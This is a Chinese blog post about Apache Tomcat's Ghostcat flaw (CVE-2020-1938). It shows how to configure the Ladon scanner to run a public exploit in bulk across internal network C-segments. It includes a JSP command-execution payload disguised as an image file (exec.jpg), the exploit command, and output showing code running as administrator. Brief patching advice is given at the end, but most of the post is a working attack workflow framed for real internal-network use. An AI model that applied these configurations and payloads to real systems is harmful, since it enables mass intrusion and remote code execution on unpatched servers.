logo

K8哥哥

没有绝对安全的系统

Ladon CVE-2020-1938跨网段、C段批量扫描内网漏洞

漏洞信息

根据国家信息安全漏洞共享平台(CNVD)20日发布的Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。

漏洞编号

cnvd-2020-10487
cve-2020-1938

漏洞条件

开放AJP端口(默认开放8009)

漏洞版本

apache tomcat 6
apache tomcat 7 < 7.0.100
apache tomcat 8 < 8.5.51
apache tomcat 9 < 9.0.31

扫描框架

Ladon设计的初衷就是一个多线程扫描框架,主要是为了让使用者能快速批量检测企业内部或外部站点漏洞
不管你擅长哪一门语言,只需要实现单一功能,都可以快速进行批量IP、批量URL、批量C段、批量B段等等
每当公开或泄露一个新漏洞时,自己要实现多现程以及批量以上功能,重写一份浪费时间,可能会错过时机
小内网可能自己写个批量IP.TXT就够用了,但是大的内网几百几千个网段就基本没有工具考虑,如批量C段
但是不要慌,无论是多线程,还是批量C段、跨网段等等,Ladon全都帮你考虑好了,只需实现单一功能即可
在Ladon的插件中配置INI方式是不需要具备编程能力的,只要会使用工具,即可实现批量调用,非常简单

Ladon配置

INI配置很简单,只需要两个参数即可。Github上随便找一份EXP,以下我用的是PYTHON版。
两种配置方式,一种是编译成EXE丢到目标上运行的,一种是PY脚本方式执行方便本地调式

EXE配置

cve-2020-1938.ini

1
2
3
[Ladon]
exe=CVE-2020-1938.exe
arg=-p 8009 -f /WEB-INF/web.xml $ip$ -c 0

PY配置

cve-2020-1938.ini

1
2
3
[Ladon]
exe=f:\python\python.exe
arg=CVE-2020-1938.py -p 8009 -f /WEB-INF/web.xml $ip$ -c 0

批量内网

把开放8009端口的IP放进ip.txt,执行以下命令即可批量扫描
当然也可以不扫端口和不扫存活IP,直接ip24.txt扫描批量C段

1
Ladon cve-2020-1938.ini

以下为内网实战批量检测结果
img

文件包含RCE

一定条件下可实现RCE,如有地方实现文件上传,往目标传个exec.jpg,内容如下,执行whoami

1
<%out.println(new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec("whoami").getInputStream())).readLine());%>
1
2
3
4
python CVE-2020-1938.py -p 8009 -f exec.jpg 192.168.1.10 -c 1
Getting resource at ajp13://192.168.1.10:8009/index.jsp
----------------------------
k82003-77562e10\administrator

漏洞修复

1.更新到安全版本

Apache Tomcat 7.0.100
Apache Tomcat 8.5.51
Apache Tomcat 9.0.31

2.关闭AJP服务

修改Tomcat配置文件Service.xml,注释掉

3、配置ajp配置

配置ajp配置中的secretRequired跟secret属性来限制认证

下载

https://github.com/k8gege/Ladon

扫码加入K8小密圈